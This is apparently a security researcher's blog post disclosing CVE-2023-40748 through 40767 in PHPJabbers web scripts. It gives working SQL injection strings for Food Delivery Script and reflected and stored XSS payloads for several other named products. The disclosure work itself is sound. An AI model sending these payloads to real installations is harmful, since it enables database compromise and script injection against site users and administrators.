Multiple vulnerabilities in PHPJabbers — Part 3

5 min readAug 24, 2023

Today, I want to follow up the previous post (https://medium.com/@mfortinsec/multiple-vulnerabilities-in-phpjabbers-part-2-4fa5e2ccfe2e) about some additional vulnerabilities discovered through a recent collaborative security research project. This was done through a local group called the Atlantic CyberSecurity Collective.

Our team, consisting of a diverse and talented group of researchers, has conducted an extensive security review on the PHPJabbers collection of scripts, and during our research, we came across some significant security vulnerabilities. It’s worth mentioning that these vulnerabilities, if exploited, could potentially pose serious threats to user data and the overall integrity of these products. We submitted our findings to MITRE, a globally recognized cybersecurity standards organization. Consequently, these vulnerabilities were validated and assigned the following Common Vulnerabilities and Exposures (CVE) identifiers:

CVE-2023–40748
CVE-2023–40749
CVE-2023–40750
CVE-2023–40751
CVE-2023–40752
CVE-2023–40753
CVE-2023–40754
CVE-2023–40755
CVE-2023–40756
CVE-2023–40757
CVE-2023–40758
CVE-2023–40759
CVE-2023–40760
CVE-2023–40761
CVE-2023–40762
CVE-2023–40763
CVE-2023–40764
CVE-2023–40765
CVE-2023–40766
CVE-2023–40767

Note that we are all professionals with full time jobs and other responsibilities. With the sheer amount of products in the PHP Jabbers lineup and limited time available, we weren’t able to assess every single product. There is a lot of code reuse in those applications, so it would be safe to assume most vulnerabilities are present in other products.

Members of the research group conducted some additional research in PHP Jabbers products and found vulnerabilities which aren’t addressed in this disclosure.

We informed the PHP Jabbers team through their online forms, but were completely ignored. Each of our attempts at communicating these vulnerabilities was met with silence and an almost instantaneous “closed” status to our submitted tickets.

Our intentions behind sharing this information aren’t to tarnish the vendor’s reputation or stir up panic among its user base. Instead, we aim to encourage proactive and transparent collaboration within the cybersecurity community. It’s crucial to remember that we all share the same goal — enhancing the overall security of products and fostering a safer digital world for users.

In the sections to follow, we will delve into each of the identified vulnerabilities:

#1: Food Delivery Script 3.0 SQL injection (SQLi) in q parameter

(CVE-2023–40748)

Edit the q parameter of index.php. Example: pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910')+OR+6100%3d6100%23%26type%3d

#2: Food Delivery Script 3.0 SQL injection (SQLi) in column parameter

(CVE-2023–40749)

Edit the column parameter. Example: controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d’’%26type%3d

#3: Reflected XSS in the action parameter of Yacht Listing Script

(CVE-2023–40750)

Edit the action parameter. Example: controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E

#4: Reflected XSS in the action parameter of Fundraising Script

(CVE-2023–40751)

Edit the action parameter. Example: controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E

#5: Reflected XSS in the action parameter of Make An Offer Widget

(CVE-2023–40752)

Edit the action parameter. Example: controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E

#6: Stored XSS in the message parameter of Ticket Support Script

(CVE-2023–40753)

Edit the message parameter in a notification creation request.
Example: notification_create=1&type=NewTicket&department_id%5B%5D=2&user_id%5B%5D=1&i18n%5B1%5D%5Bsubject%5D=a&i18n%5B1%5D%5Bmessage%5D=%3C%2Ftextarea%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Ctextarea%3E